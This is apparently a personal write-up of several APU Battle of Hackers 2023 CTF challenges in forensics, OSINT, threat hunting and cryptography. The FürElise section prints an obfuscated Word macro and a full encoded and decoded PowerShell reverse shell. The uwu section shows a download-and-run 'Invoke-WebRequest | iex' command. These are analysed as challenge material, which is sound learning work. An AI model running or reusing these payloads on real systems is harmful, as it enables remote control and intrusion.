APU Battle of Hackers CTF 2023 - Writeups
This was the first CTF that I’ve participated in with new teammates @Wowiee and his friend @Damien. Sadly @Damien had covid so he could not attend the CTF physically, however, he still tried his best to solve certain challenges despite being sick. In the end we managed to achieve 13th place out of 107 teams.
Crack Store [Forensics]
Flag: ABOH23{n0t_That_KINd_oF_CR4Ck_S70RE}
We are given a zip file to presumably crack. Unfortunately I could not solve this during the competition but I attempted it at home. The challenge author @Zach told us the challenge was similar to a John Hammond video on brute forcing zip files. Analyzing the zip file, we find out that the zip is encrypted with ZipCrypto Store
method which is vulnerable to the plaintext attack.
According to John Hammond, we can use the bkcrack
tool to crack open these zip files. Since the host
file will always have # Copyright (c) 1993-2009 Microsoft Corp.
at the beginning of the file, we can create our own text file using this phrase to attempt plaintext attack.
FürElise [Forensics]
Flag: ABOH23{d!ff1cU17_s0Ng_FROm_hEaRtBrE4K}
We are given a file without any extension called heartbroken
. Checking its contents, an obfuscated function can be found. Noticing a URL can be formed by removing the repetitive ampersands (&), we can obtain two URLs after deobfuscating them.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
Sub Document_Open()
Set dCBkaW1pbm = CreateObject("WScript.Shell")
pbmcgYXQgY3Jvc = "&h&t&t&p&s&:&/&/&"
CBtYXR0ZXJucy = "&p&a&s&t&e&b&i&n&.&c&o&m&"
4gb3ZlciB3ZSB = "&/&r&a&w&/&K&h&4&V&y&U&Y&c&"
Replace(luY2lkZW50IG, "&", "")
Replace(luZyB0aGF0IG, "&", "")
Replace(VsZCBkZWNvZG, "&", "")
Replace(N0b3JzLCBjb3, "&", "")
Replace(BkZWZpbmVkIH, "&", "")
Replace(4gY29tcGxleC, "&", "")
Replace(pbmcgYXQgY3Jvc, "&", "")
Replace(CBtYXR0ZXJucy, "&", "")
Replace(4gb3ZlciB3ZSB, "&", "")
dCBkaW1pbm.Exec("whoami")
luY2lkZW50IG = "h&t&t&p&s&:/&/g&i&s&t&.&g&i&t&h&u&b&u&s&e&r&c&o&n&t&e&n&t&.&c&o&m&/z&a&c&h&w&o&n&g&0&2"
luZyB0aGF0IG = "/5&a&8&e&7&d&3&6&5&c&6&d&9&b&6&4&9&b&1&2&b&e&3&c&8&9&0&c&8&c&b&4"
VsZCBkZWNvZG = "/raw"
N0b3JzLCBjb3 = "/85f79114e8cb93dca7d1ae44d5fdd81aa95d021e9"
BkZWZpbmVkIH = "/gistfile1"
4gY29tcGxleC = ".txt"
End Sub
One part of the flag can be obtained with the first URL https://pastebin.com/raw/Kh4VyUYc
. However, the second URL decoded was a URL to a GitHub stored text file. Within the text file was a string encoded with Powershell, so this is probably a powershell script.
1
powershell.exe -exec bypass -enc aQBmACAAKAAtAG4AbwB0ACgAJgAoACQAKABbAGMAaABhAHIAXQAoADkAOQArADgANAAtADkAOQApACsAWwBjAGgAYQByAF0AKAA2ADcAKgAxADAAMQAvADYANwApACsAWwBjAGgAYQByAF0AKAAwACsAMQAxADUALQAwACkAKwBbAGMAaABhAHIAXQAoADAAKwAxADEANgAtADAAKQArAFsAYwBoAGEAcgBdACgAMQA2ACsANAA1AC0AMQA2ACkAKwBbAGMAaABhAHIAXQAoADEAMQA0ACsAOAAwAC0AMQAxADQAKQArAFsAYwBoAGEAcgBdACgAOQA2ACoAOQA3AC8AOQA2ACkAKwBbAGMAaABhAHIAXQAoADAAKwAxADEANgAtADAAKQArAFsAYwBoAGEAcgBdACgAMAArADEAMAA0AC0AMAApACkAKQAgAC0AUABhAHQAaAAgACgAJAAoACcAJAAnACsAJwBlACcAKwAnAG4AJwArACcAdgAnACsAJwA6ACcAKwAnAFUAJwArACcAUwAnACsAJwBFACcAKwAnAFIAJwArACcAUAAnACsAJwBSACcAKwAnAE8AJwArACcARgAnACsAJwBJACcAKwAnAEwAJwArACcARQAnACkAIAArACAAKABbAHMAdAByAGkAbgBnAF0AOgA6AGoAbwBpAG4AKAAnACcALAAgACgAIAAoADkAMgAsADYAOAAsADEAMAAxACwAMQAxADUALAAxADAANwAsADEAMQA2ACwAMQAxADEALAAxADEAMgAsADkAMgAsADcANwAsADEAMQA3ACwAMQAxADUALAAxADAANQAsADkAOQApACAAfAAlAHsAIAAoACAAWwBjAGgAYQByAF0AWwBpAG4AdABdACAAJABfACkAfQApACkAIAB8ACAAJQAgAHsAJABfAH0AKQApACAALQBQAGEAdABoAFQAeQBwAGUAIAAoACgAWwBzAHQAcgBpAG4AZwBdADoAOgBqAG8AaQBuACgAJwAnACwAIAAoACAAKAA3ADYALAAxADAAMQAsADkANwAsADEAMAAyACkAIAB8ACUAewAgACgAIABbAGMAaABhAHIAXQBbAGkAbgB0AF0AIAAkAF8AKQB9ACkAKQAgAHwAIAAlACAAewAkAF8AfQApACkAKQApAHsACgAJACYAIAAoACgAIgBqAEQAawBhAHYAWABmAC0AcAA5ADgATwBZAFMAaAB0AE0AZwA0AEEAMgBjAE4ANQB4AFAASQBIAGUARgAxAHoAeQBFAGwAVABuAHcAWgBtAFIAYgBMAEsAUQBHAGkAcwBKAEMAMABVAFcAbwBCAFYAZAB1AHEAcgA2ADMANwAiACkAWwAzADcALAA1ADkALAA0ADYALAAxADUALAAyADgALAA3ACwAMQA0ACwANQAzACwANAA3ACwAMQA1AF0AIAAtAGoAbwBpAG4AIAAnACcAKQAgACgAKAAnAGQAJwArACcAbwAnACsAJwBuACcAKwAnAHQAJwArACcAIAAnACsAJwBlACcAKwAnAHgAJwArACcAZQAnACsAJwBjACcAKwAnAHUAJwArACcAdAAnACsAJwBlACcAKwAnACAAJwArACcAdAAnACsAJwBoACcAKwAnAGUAJwArACcAIAAnACsAJwBzACcAKwAnAGMAJwArACcAcgAnACsAJwBpACcAKwAnAHAAJwArACcAdAAnACsAJwAuACcAKwAnAC4AJwArACcALgAnACsAJwAgACcAKwAnAGEAJwArACcAbQAnACsAJwBhACcAKwAnAHQAJwArACcAZQAnACsAJwB1ACcAKwAnAHIAJwArACcAIAAnACsAJwBtACcAKwAnAG8AJwArACcAbQAnACsAJwBlACcAKwAnAG4AJwArACcAdAAnACsAJwAuACcAKwAnAC4AJwArACcALgAnACkAKQAKAAkAcgBlAHQAdQByAG4ACgB9AAoAJABMAEgATwBTAFQAIAA9ACAAJAAoAFsAYwBoAGEAcgBdACgAMwA2ACoAMwA2AC8AMwA2ACkAKwBbAGMAaABhAHIAXQAoADcANgArADQAMAAtADcANgApACsAWwBjAGgAYQByAF0AKAAwACsANAA5AC0AMAApACsAWwBjAGgAYQByAF0AKAAyADcAKgA0ADMALwAyADcAKQArAFsAYwBoAGEAcgBdACgAMAArADQAOQAtADAAKQArAFsAYwBoAGEAcgBdACgAMgA3ACoANAAzAC8AMgA3ACkAKwBbAGMAaABhAHIAXQAoADgANgArADQAOAAtADgANgApACsAWwBjAGgAYQByAF0AKAAwACsANAA1AC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANAA5AC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANAAxAC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsAOQA5AC0AMAApACsAWwBjAGgAYQByAF0AKAA5ADgAKwA5ADcALQA5ADgAKQArAFsAYwBoAGEAcgBdACgANQAyACsAMQAxADYALQA1ADIAKQArAFsAYwBoAGEAcgBdACgANwAqADEAMAAxAC8ANwApACsAWwBjAGgAYQByAF0AKAAwACsANgAyAC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANQA3AC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANQAwAC0AMAApACsAWwBjAGgAYQByAF0AKAAwACsANAA2AC0AMAApACsAWwBjAGgAYQByAF0AKAA0ADMAKgA0ADkALwA0ADMAKQArAFsAYwBoAGEAcgBdACgAMAArADUANAAtADAAKQArAFsAYwBoAGEAcgBdACgAMQAxADYAKwA1ADYALQAxADEANgApACsAWwBjAGgAYQByAF0AKAAzADcAKgA0ADYALwAzADcAKQArAFsAYwBoAGEAcgBdACgAOAA2ACoANQAwAC8AOAA2ACkAKwBbAGMAaABhAHIAXQAoADkANAAqADUAMAAvADkANAApACsAWwBjAGgAYQByAF0AKAAwACsANAA5AC0AMAApACsAWwBjAGgAYQByAF0AKAA3ADYAKwA0ADYALQA3ADYAKQArAFsAYwBoAGEAcgBdACgAMAArADQAOQAtADAAKQArAFsAYwBoAGEAcgBdACgANwA0ACsANQAyAC0ANwA0ACkAKwBbAGMAaABhAHIAXQAoADkANgAqADUANgAvADkANgApACkAOwAKACQATABQAE8AUgBUACAAPQAgACgAJAAoADQANAA0ADQAKQApADsACgAkAFQAQwBQAEMAbABpAGUAbgB0ACAAPQAgACYAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoAagBvAGkAbgAoACcAJwAsACAAKAAgACgANwA4ACwAMQAwADEALAAxADEAOQAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApACAAfAAlAHsAIAAoACAAWwBjAGgAYQByAF0AWwBpAG4AdABdACAAJABfACkAfQApACkAIAB8ACAAJQAgAHsAJABfAH0AKQAgAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAJABMAEgATwBTAFQALAAgACQATABQAE8AUgBUACkAOwAKACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQAgAD0AIAAkAFQAQwBQAEMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsACgAkAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACAAPQAgACYAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoAagBvAGkAbgAoACcAJwAsACAAKAAgACgANwA4ACwAMQAwADEALAAxADEAOQAsADQANQAsADcAOQAsADkAOAAsADEAMAA2ACwAMQAwADEALAA5ADkALAAxADEANgApACAAfAAlAHsAIAAoACAAWwBjAGgAYQByAF0AWwBpAG4AdABdACAAJABfACkAfQApACkAIAB8ACAAJQAgAHsAJABfAH0AKQAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgAJABOAGUAdAB3AG8AcgBrAFMAdAByAGUAYQBtACkAOwAKACQAUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAIAA9ACAAJgAgACgAWwBzAHQAcgBpAG4AZwBdADoAOgBqAG8AaQBuACgAJwAnACwAIAAoACAAKAA3ADgALAAxADAAMQAsADEAMQA5ACwANAA1ACwANwA5ACwAOQA4ACwAMQAwADYALAAxADAAMQAsADkAOQAsADEAMQA2ACkAIAB8ACUAewAgACgAIABbAGMAaABhAHIAXQBbAGkAbgB0AF0AIAAkAF8AKQB9ACkAKQAgAHwAIAAlACAAewAkAF8AfQApACAASQBPAC4AUwB0AHIAZQBhAG0AVwByAGkAdABlAHIAKAAkAE4AZQB0AHcAbwByAGsAUwB0AHIAZQBhAG0AKQA7AAoAJABTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAuAEEAdQB0AG8ARgBsAHUAcwBoACAAPQAgACQAdAByAHUAZQA7AAoAJABCAHUAZgBmAGUAcgAgAD0AIAAmACAAKABbAHMAdAByAGkAbgBnAF0AOgA6AGoAbwBpAG4AKAAnACcALAAgACgAIAAoADcAOAAsADEAMAAxACwAMQAxADkALAA0ADUALAA3ADkALAA5ADgALAAxADAANgAsADEAMAAxACwAOQA5ACwAMQAxADYAKQAgAHwAJQB7ACAAKAAgAFsAYwBoAGEAcgBdAFsAaQBuAHQAXQAgACQAXwApAH0AKQApACAAfAAgACUAIAB7ACQAXwB9ACkAIABTAHkAcwB0AGUAbQAuAEIAeQB0AGUAWwBdACAAJAAoACQAKAAxADAAMgA0ACkAKQA7AAoAdwBoAGkAbABlACAAKAAkAFQAQwBQAEMAbABpAGUAbgB0AC4AQwBvAG4AbgBlAGMAdABlAGQAKQAgAHsAIAB3AGgAaQBsAGUAIAAoACQATgBlAHQAdwBvAHIAawBTAHQAcgBlAGEAbQAuAEQAYQB0AGEAQQB2AGEAaQBsAGEAYgBsAGUAKQAgAHsAIAAkAFIAYQB3AEQAYQB0AGEAIAA9ACAAJABOAGUAdAB3AG8AcgBrAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAQgB1AGYAZgBlAHIALgBMAGUAbgBnAHQAaAApADsACgAkAGMAMgAgAD0AIAAkACgAWwBjAGgAYQByAF0AKAAyADcAKgAxADAANAAvADIANwApACsAWwBjAGgAYQByAF0AKAA2ADAAKwAxADEANgAtADYAMAApACsAWwBjAGgAYQByAF0AKAA1ADcAKgAxADEANgAvADUANwApACsAWwBjAGgAYQByAF0AKAA2ADcAKgAxADEAMgAvADYANwApACsAWwBjAGgAYQByAF0AKAAxADgAKwAxADEANQAtADEAOAApACsAWwBjAGgAYQByAF0AKAAyADgAKwA1ADgALQAyADgAKQArAFsAYwBoAGEAcgBdACgANwA2ACoANAA3AC8ANwA2ACkAKwBbAGMAaABhAHIAXQAoADUAMAAqADQANwAvADUAMAApACsAWwBjAGgAYQByAF0AKAA4ADMAKgAxADEAMgAvADgAMwApACsAWwBjAGgAYQByAF0AKAA4ADkAKgA5ADcALwA4ADkAKQArAFsAYwBoAGEAcgBdACgAMAArADEAMQA1AC0AMAApACsAWwBjAGgAYQByAF0AKAAyADMAKgAxADEANgAvADIAMwApACsAWwBjAGgAYQByAF0AKAA3ACoAMQAwADEALwA3ACkAKwBbAGMAaABhAHIAXQAoADcAOAArADkAOAAtADcAOAApACsAWwBjAGgAYQByAF0AKAA3ADYAKgAxADAANQAvADcANgApACsAWwBjAGgAYQByAF0AKAA4ADYAKwAxADEAMAAtADgANgApACsAWwBjAGgAYQByAF0AKAAwACsANAA2AC0AMAApACsAWwBjAGgAYQByAF0AKAA4ADYAKgA5ADkALwA4ADYAKQArAFsAYwBoAGEAcgBdACgANQAyACoAMQAxADEALwA1ADIAKQArAFsAYwBoAGEAcgBdACgAMQAwADAAKwAxADAAOQAtADEAMAAwACkAKwBbAGMAaABhAHIAXQAoADEAMAAqADQANwAvADEAMAApACsAWwBjAGgAYQByAF0AKAAwACsAMQAxADQALQAwACkAKwBbAGMAaABhAHIAXQAoADkANAArADkANwAtADkANAApACsAWwBjAGgAYQByAF0AKAA5ADUAKwAxADEAOQAtADkANQApACsAWwBjAGgAYQByAF0AKAAyADUAKgA0ADcALwAyADUAKQArAFsAYwBoAGEAcgBdACgAMAArADcANAAtADAAKQArAFsAYwBoAGEAcgBdACgANQA5ACoANgA3AC8ANQA5ACkAKwBbAGMAaABhAHIAXQAoADMAMQArADEAMAAzAC0AMwAxACkAKwBbAGMAaABhAHIAXQAoADAAKwA3ADYALQAwACkAKwBbAGMAaABhAHIAXQAoADUANgArADEAMgAyAC0ANQA2ACkAKwBbAGMAaABhAHIAXQAoADUANwArADUAMgAtADUANwApACsAWwBjAGgAYQByAF0AKAAwACsAMQAwADIALQAwACkAKwBbAGMAaABhAHIAXQAoADQAMAAqADQAOQAvADQAMAApACkAOwAKACQAQwBvAGQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4ACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUgBhAHcARABhAHQAYQAgAC0AMQApACAAfQA7AAoAaQBmACAAKAAkAFQAQwBQAEMAbABpAGUAbgB0AC4AQwBvAG4AbgBlAGMAdABlAGQAIAAtAGEAbgBkACAAJABDAG8AZABlAC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADEAKQAgAHsAIAAkAE8AdQB0AHAAdQB0ACAAPQAgAHQAcgB5ACAAewAgACYAIAAoAFsAcwB0AHIAaQBuAGcAXQA6ADoAagBvAGkAbgAoACcAJwAsACAAKAAgACgANwAzACwAMQAxADAALAAxADEAOAAsADEAMQAxACwAMQAwADcALAAxADAAMQAsADQANQAsADYAOQAsADEAMgAwACwAMQAxADIALAAxADEANAAsADEAMAAxACwAMQAxADUALAAxADEANQAsADEAMAA1ACwAMQAxADEALAAxADEAMAApACAAfAAlAHsAIAAoACAAWwBjAGgAYQByAF0AWwBpAG4AdABdACAAJABfACkAfQApACkAIAB8ACAAJQAgAHsAJABfAH0AKQAgACgAJABDAG8AZABlACkAIAAyAD4AJgAxACAAfQAgAGMAYQB0AGMAaAAgAHsAIAAkAF8AIAB9ADsACgAkAFMAdAByAGUAYQBtAFcAcgBpAHQAZQByAC4AVwByAGkAdABlACgAJAAoACgAJAAoACcAJAAnACsAJwBPACcAKwAnAHUAJwArACcAdAAnACsAJwBwACcAKwAnAHUAJwArACcAdAAnACsAJwBgACcAKwAnAG4AJwApACkAKQApADsACgAkAEMAbwBkAGUAIAA9ACAAJABuAHUAbABsACAAfQAgAH0AOwAKACQAVABDAFAAQwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApADsACgAkAE4AZQB0AHcAbwByAGsAUwB0AHIAZQBhAG0ALgBDAGwAbwBzAGUAKAApADsACgAkAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByAC4AQwBsAG8AcwBlACgAKQA7AAoAJABTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAuAEMAbABvAHMAZQAoACkAOwAKAAoA
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
if (-not(&($([char](99+84-99)+[char](67*101/67)+[char](0+115-0)+[char](0+116-0)+[char](16+45-16)+[char](114+80-114)+[char](96*97/96)+[char](0+116-0)+[char](0+104-0))) -Path ($('$'+'e'+'n'+'v'+':'+'U'+'S'+'E'+'R'+'P'+'R'+'O'+'F'+'I'+'L'+'E') + ([string]::join('', ( (92,68,101,115,107,116,111,112,92,77,117,115,105,99) |%{ ( [char][int] $_)})) | % {$_})) -PathType (([string]::join('', ( (76,101,97,102) |%{ ( [char][int] $_)})) | % {$_})))){
& (("jDkavXf-p98OYShtMg4A2cN5xPIHeF1zyElTnwZmRbLKQGisJC0UWoBVduqr637")[37,59,46,15,28,7,14,53,47,15] -join '') (('d'+'o'+'n'+'t'+' '+'e'+'x'+'e'+'c'+'u'+'t'+'e'+' '+'t'+'h'+'e'+' '+'s'+'c'+'r'+'i'+'p'+'t'+'.'+'.'+'.'+' '+'a'+'m'+'a'+'t'+'e'+'u'+'r'+' '+'m'+'o'+'m'+'e'+'n'+'t'+'.'+'.'+'.'))
return
}
$LHOST = $([char](36*36/36)+[char](76+40-76)+[char](0+49-0)+[char](27*43/27)+[char](0+49-0)+[char](27*43/27)+[char](86+48-86)+[char](0+45-0)+[char](0+49-0)+[char](0+41-0)+[char](0+99-0)+[char](98+97-98)+[char](52+116-52)+[char](7*101/7)+[char](0+62-0)+[char](0+57-0)+[char](0+50-0)+[char](0+46-0)+[char](43*49/43)+[char](0+54-0)+[char](116+56-116)+[char](37*46/37)+[char](86*50/86)+[char](94*50/94)+[char](0+49-0)+[char](76+46-76)+[char](0+49-0)+[char](74+52-74)+[char](96*56/96));
$LPORT = ($(4444));
$TCPClient = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) Net.Sockets.TCPClient($LHOST, $LPORT);
$NetworkStream = $TCPClient.GetStream();
$StreamReader = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) IO.StreamReader($NetworkStream);
$StreamWriter = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) IO.StreamWriter($NetworkStream);
$StreamWriter.AutoFlush = $true;
$Buffer = & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_}) System.Byte[] $($(1024));
while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length);
$c2 = $([char](27*104/27)+[char](60+116-60)+[char](57*116/57)+[char](67*112/67)+[char](18+115-18)+[char](28+58-28)+[char](76*47/76)+[char](50*47/50)+[char](83*112/83)+[char](89*97/89)+[char](0+115-0)+[char](23*116/23)+[char](7*101/7)+[char](78+98-78)+[char](76*105/76)+[char](86+110-86)+[char](0+46-0)+[char](86*99/86)+[char](52*111/52)+[char](100+109-100)+[char](10*47/10)+[char](0+114-0)+[char](94+97-94)+[char](95+119-95)+[char](25*47/25)+[char](0+74-0)+[char](59*67/59)+[char](31+103-31)+[char](0+76-0)+[char](56+122-56)+[char](57+52-57)+[char](0+102-0)+[char](40*49/40));
$Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) };
if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { & ([string]::join('', ( (73,110,118,111,107,101,45,69,120,112,114,101,115,115,105,111,110) |%{ ( [char][int] $_)})) | % {$_}) ($Code) 2>&1 } catch { $_ };
$StreamWriter.Write($(($('$'+'O'+'u'+'t'+'p'+'u'+'t'+'`'+'n'))));
$Code = $null } };
$TCPClient.Close();
$NetworkStream.Close();
$StreamReader.Close();
$StreamWriter.Close();
Analyzing the decoded script, we can find a suspcious variable called $c2
which indicates a C2 server. Running the variable on Powershell, the second part of the flag can be obtained with the second URL https://pastebin.com/raw/JCgLz4f1
.
With the two URLs, the flag can be obtained.
uwu [Forensics]
Flag: ABOH23{pER5!St3NCE_!5_my_ninj@_waY}
We are given a E01 file to investigate. Using Autopsy, an image of a Windows machine can be analyzed. Going through common directories, a credentials.txt
file was found in the user’s Desktop and it shows the username and passwords of several users.
Checking out the Downloads folder, several files with base64 encoded filenames, a password-locked zip file and a suspicious exe file called kotoamatsukami.exe
can be found.
Remembering about the credential file obtained previously, I used naruto’s password dattebayo
on it and it worked. Inside the zip file was a bunch of videos and after spending 2-3 hours analyzing them, they were useless.
Back into a loophole, I analyzed kotoamatsukami.exe
by running it on my machine. Running it caused my Desktop wallpaper to change into a sharingan (Damn you Shisui!!). At this point I could not solve it before the CTF ended but I attempted it at home after reading a writeup from @OctaneSan.
Using Procmon, I can check what it actually does in my system other than changing the wallpaper. Additionally, from the file thumbnail, kotoamatsukami.exe
seems to be a Python executable. Analyzing the processes, a malicious operation that links with the registry key and shell was found.
Jumping to the process, we can see a powershell command being invoked.
1
powershell -exec bypass -c 'Invoke-WebRequest https://gist.githubusercontent.com/zachwong02/9f9054bc9db15aeb453dc37e59878aac/raw/48f39f9328189ae8260c6e040eb6d3b57403135e/gistfile1.txt | iex'
Running the powershell script, it leads to an obfuscated text file which seems to be reading the metadata of the genjutsu.jpg
image located in the Downloads folder. The script extracts each character of the Title
metadata to craft a string. So running the command after importing the module and placing the image file in the Downloads folder, the flag can be obtained.
1
2
$chars = Get-FileMetaData $env:USERPROFILE\Downloads\genjutsu.jpg | Select-Object -ExpandProperty "Title"
$chars[0] + $chars[1] + $chars[14] + $chars[7] + $chars[54] + $chars[55] + $chars[65] + $chars[41] + $chars[4] + $chars[17] + $chars[57] + $chars[62] +$chars[18] + $chars[45] + $chars[55] + $chars[13] + $chars[2] + $chars[4] + $chars[63] + $chars[62] + $chars[57] + $chars[63] + $chars[38] + $chars[50] + $chars[63] + $chars[39] + $chars[34] + $chars[39] + $chars[35] + $chars[64] + $chars[63] + $chars[48] + $chars[26] + $chars[24] + $chars[66]
SCP 2.0 [Forensics]
Flag: ABOH23{C0NT41nm3Nt_Breach_8Y_M@cr0$}
We are given a memory dump and a pdf file about a SCP specimen to investigate. Unfortunately I could not solve this during the competition but I attempted it at home. Thanks @Encient for her writeup! Reading the pdf file given, it says that employees are required to backup data including documentation, images, videos, etc.
Analyzing the processes and files with SCP
as the keyword, a suspicious document file can be obtained.
Dumping the document file, I read its contents and found the flag file located in the user’s Desktop. However, it seems that the file was missing in the memory dump since it could not be obtained via filescan.
Referring back to the pdf file, it also mentions that employees must “eradicate” or in another words delete the data. So it seeems the flag was probably deleted and hence I should find it in another way.
This is where @Encient was smart about it, we can actually extract the MFT of the machine using a plugin from Volatility2 called mftparser
. After parsing the MFT data, we can either grep .txt
or $Recycle
to locate the flag file since it was probably located in the Recycle bin. The flag file was named $RD0BID3.txt
after deletion.
Finding the flag file, its data can be decoded to obtain the flag.
Hippity Hoppity Your Culture [OSINT]
Flag: ABOH23{Oc.1716}
We are tasked to find the registration number of a specific flute. Google it.
Who’s That Pokémon? [OSINT]
Flag: ABOH23{Charizard_VSTAR,Narrow_Miscut,9}
We are tasked to find a specific Pokemon card with its card name, error type and original grade. A CGC cert number 4302093025
was provided to start our search, so I used the official CGC card verifier to identify the card.
Verifying the card, we can identify the name and number of the card, but it seems that the error type and grade is not present for some reason. So I tried to just Google the cert number and found a video on a Charizard VSTAR
card error.
Zooming into the card, the cert number proves that this is the card we are looking for, and hence the flag too.
We All Have That 1 K-Everything [OSINT]
Flag: ABOH23{631fee75fca0c0b9536339f34e71304c}
We are tasked to find a specific location shown in these two videos Kpop MV and the LCK trailer. Watching the videos carefully, it seems that the location shown in both videos is a container yard.
So I tried reverse searching the LCK image and got the exact location in this website.
Search the address on Google Maps to get the right location and hash it in MD5 to get the flag.
Sky Full of Cables [OSINT]
Flag: ABOH23{Krung_Thonburi_Charoen_Nakhon}
We are tasked to find the two specific stations between the person in the picture. Reverse searching the picture, it seems that this place could potentially be in Thailand, specifically Bangkok.
Sadly I could not solve this before the CTF ended, so I attempted it at home. I narrowed my search by going through different parts of the picture. After several minutes of searching, I found this Youtube video that could help in finding the specific location.
It looks like the location could be in Golden Line
, so I continued looking for clues in the picture and found a barber at the bottom of the picture.
Googling the barber store’s name 54 Barber
, the location was indeed Golden Line
.
We can even see the tall bulky building indicated at the right corner of the picture.
Now we just have to find the two stations between this line. We can see it starts at Krung Thonburi (Golden Line)
and stops at Charoen Nakhon
. So the flag is these two stations.
A Shark Bit My Report [OSINT]
Flag: ABOH23{Ironbound_Island_Nova_Scotia}
We are tasked to the find the last ping location of a shark that bit the author’s report in her blog. Inside the author’s blog, nothing can be found. However, since the challenge said that the shark bit her report (past tense), the report can be recovered using WayBackMachine to essentially “go back in time”.
Looking through the report, it was filled with random text and irrelevent clues for finding the flag. However, there is a statement that could prove beneficial. They mentioned that the shark was a Male, so we could use that information to filter something else later on.
We also found a supposedly barcode at the bottom of the page, but after several minutes on decoding it, it was completely irrelevent. Sadly I could not solve this before the CTF ended, so I attempted it at home.
Later on, I found a website that pings ocean sharks. Since we know its a Male shark, we can filter it and narrow our search. However, the author updated the flag saying that we should change the filters to specify Tracking Activity
to show the most recent only. Apparently the shark’s ping suddenly went alive the moment the CTF started (what a coincidence). With this update, many people finally knew which shark to take and the answer can be found by looking at the most recent shark ping was Bob
.
Ransomware 1 [Threat Hunting]
Flag: ABOH23{Mcqqic24UJyU40JKdja0A.exe}
We are given a compromised Windows machine that was recently attacked by a ransomware to investigate. The first question was to find the filename of the ransomware somewhere inside the machine. My method was to just manually analyze common folders like Desktop, Downloads, Temp, etc. Going through all of them, I found two suspicious programs in the System32
folder. The ransomware was Mcqqic24UJyU40JKdja0A.exe
.
However, after the CTF ended, I felt like the best way to find suspicious executables (accordng to SANS) was by using either Amcache, Shimcache or even Prefetch files. So by using AmcacheParser from EZTools, we can extract the Amcache located in C:\Windows\appcompat\Programs\Amcache.hve
and parse it to be analyze further using Timeline Explorer. Going through Timeline Explorer, we can find two suspicious executables in System32.
Ransomware 2 [Threat Hunting]
Flag: ABOH23{2e1594cea1d8e012c709f3d71a4e57dcbc9d017b89f623822fc56c9f734eb491}
The second question was to identify the SHA256 hash value of the executable responsible for exfiltrating data. We know there is another suspcious program located in the same folder with the ransomware. So I analyzed the other malicious executable ifPUXc85P8DnPFx7wYHbYw.exe
using VirusTotal and found out it was a filestealer program.
Ransomware 3 [Threat Hunting]
Flag: ABOH23{http://146.190.89.115:8080/YPAPJDoGD3aIQlFix11ZA.php}
The third question was to identify the external connection created by ifPUXc85P8DnPFx7wYHbYw.exe
. Using Virustotal again, we can see the network communications were made to 146.190.89.115:8080
.
May The Force Be With You [Cryptography]
Flag: ABOH23{A3S_Rul35_tH3_F0rc3}
We were given an encryption script and the encoded text.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad
from Crypto.Random import get_random_bytes
from Crypto.Protocol.KDF import PBKDF2
import textwrap
def encrypt_file(file_path, password):
with open(file_path, 'rb') as file:
plaintext = file.read()
iv = get_random_bytes(AES.block_size)
passwd = textwrap.dedent(password)[:-1]
salt = b'salt123'
key = PBKDF2(passwd.encode(), salt, dkLen=16)
cipher = AES.new(key, AES.MODE_CBC, iv)
ciphertext = cipher.encrypt(pad(plaintext, AES.block_size))
encrypted_file_path = file_path + '.enc'
with open(encrypted_file_path, 'wb') as file:
file.write(ciphertext + iv)
print("Encryption successful. Encrypted file saved as:", encrypted_file_path)
password = "ni5h2h?Yrq8Do?n+|6a;pKbZkv%}O~tV"
file_path = "./flag.txt"
encrypt_file(file_path, password)
1
2
3
N: 28161864534081810305839467239167774824180698442991360538137338315924601027539535041400325106523598882827263670671140966855944057889837783992080270143420119844958855679728614805589197733901663249220100214524859116110365815705699485099116276988534253521580223115836247118089590595980346272692504104976860138248959015932618979651746563030552421216691329694961700647328850519321776696007920491542096366696034760558758393690945535590284240994579352805664119144134863786797266463118165575746650538843159490903440899114347091988968775074879305009340592457617508211781199057573663246634610497629416920053419998682083393087987
C: 762355112596222421309825166446067448121886093544068458795156044255325081286699861240486430215279901835675723822721970949307265398924333599178805487220325668055743991293697494477706560130827449405781098938392283482757063955895656607033694619449376928780098570577226994800731087835230561205556094959240210387000
e: 3
Since the script already has the password, I created a decryption script with ChatGPT to obtain flag.
1
2
3
4
5
6
7
8
9
10
11
12
